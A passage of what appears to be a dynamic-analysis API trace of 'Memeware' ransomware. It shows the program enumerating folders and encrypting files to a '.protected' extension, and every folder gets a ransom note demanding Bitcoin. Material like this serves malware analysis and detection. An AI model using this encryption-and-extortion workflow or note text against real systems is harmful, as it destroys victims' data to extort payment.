hFindFile=0x490a28) returned 1 [0075.440] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0075.440] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.440] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.440] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.442] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.442] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.442] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.442] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0075.442] CloseHandle (hObject=0xa4) returned 1 [0075.442] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="Windows") returned -1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="Program Files") returned -1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="Program Files (x86)") returned -1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="$Recycle.bin") returned 1 [0075.442] lstrcmpiW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="System Volume Information") returned -1 [0075.442] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 71 [0075.442] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2=".") returned 1 [0075.442] lstrcmpW (lpString1="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpString2="..") returned 1 [0075.442] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*") returned 73 [0075.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.443] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.443] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.443] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.443] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.443] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.443] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\.") returned 73 [0075.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.443] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.443] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.444] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.444] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\..") returned 74 [0075.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.444] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0075.444] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0075.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.444] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0075.444] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0075.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0075.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0075.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.589] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0075.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.589] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0075.589] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0075.589] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0075.589] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0075.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.590] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0075.590] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.590] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0075.590] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0075.590] CloseHandle (hObject=0xb4) returned 1 [0075.591] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected") returned 91 [0075.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.protected")) returned 1 [0075.622] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Windows") returned -1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files") returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="Program Files (x86)") returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="$Recycle.bin") returned 1 [0075.622] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="System Volume Information") returned 1 [0075.622] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.622] StrStrIW (lpFirst="vcredist_x64.exe", lpSrch=".protected") returned 0x0 [0075.622] lstrcmpW (lpString1="vcredist_x64.exe", lpString2="RESTORE_FILES.txt") returned 1 [0075.622] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0075.623] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0075.623] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.624] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.624] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".txt") returned 0x0 [0075.624] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.624] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".rar") returned 0x0 [0075.624] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned 88 [0075.624] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".zip") returned 0x0 [0075.624] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0075.689] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.689] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0075.690] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.690] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0075.850] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0075.850] CloseHandle (hObject=0xb4) returned 1 [0075.850] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected") returned 98 [0075.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.protected")) returned 1 [0075.851] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.851] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.851] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt") returned 89 [0075.851] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.935] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.935] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.936] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.936] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.936] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.936] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0075.936] CloseHandle (hObject=0xa4) returned 1 [0075.936] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="Windows") returned -1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="Program Files") returned -1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0075.936] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0075.937] lstrcmpiW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="System Volume Information") returned -1 [0075.937] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030") returned 82 [0075.937] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2=".") returned 1 [0075.937] lstrcmpW (lpString1="{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030", lpString2="..") returned 1 [0075.937] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*") returned 84 [0075.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.996] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.996] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.996] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.996] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.998] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.999] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\.") returned 84 [0075.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.999] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.999] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.999] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.999] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.999] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.999] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.999] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\..") returned 85 [0075.999] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.999] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0075.999] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0075.999] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned 91 [0075.999] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0075.999] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0076.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*") returned 93 [0076.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0076.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\.") returned 93 [0076.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.000] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.000] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.000] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.000] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.000] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.000] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.000] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\..") returned 94 [0076.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.000] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.000] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="Windows") returned -1 [0076.000] 